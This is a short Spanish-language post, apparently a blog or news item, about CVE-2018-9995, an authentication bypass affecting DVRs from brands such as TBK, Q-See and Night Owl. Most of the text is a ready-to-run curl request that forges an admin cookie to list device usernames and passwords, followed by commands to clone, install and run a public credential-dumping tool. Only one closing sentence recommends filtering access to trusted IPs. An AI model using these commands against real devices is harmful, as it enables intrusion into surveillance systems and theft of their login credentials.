Basado en el CVE-2018-9995 cargado por un investigador de seguridad informática hace ya un mes, se encontró que múltiples DVRs eran vulnerables a “bypass authentication”, para ello creo una aplicación llamada “Gets DVR Credentials” con la cual se puede acceder a los mismos.
Para probar el exploit simplemente se debe ejecutar:
curl "http://[HOST/IP]:[PUERTO]/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
Como resultado de dicha ejecución van a obtener varios datos, los que nos interesan son uid y pwd; estos dos parámetros están seguidos de un valor entre comillas que son las credenciales.
En caso de querer utilizar la aplicación antes mencionada deben ejecutar los siguientes comandos:
// Instalación git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git cd CVE-2018-9995_dvr_credentials pip install -r requirements.txt // Prueba python getDVR_Credentials.py --host [HOST/IP] --port [PUERTO]
Las marcas afectadas comprobadas hasta el momento son:
- TBK
- Novo
- CeNova
- QSee
- Pulnix
- XVR 5 in 1
- Securus
- Night OWL
- DVR Login
- HVR Login
- MDVR Login
Como siempre, para estos casos, la recomendación es filtrar por IPs de confianza, asi solamente pueden tener accedo dichas IPs y no cualquier persona que navega por internet.
Fuente: Redes Zone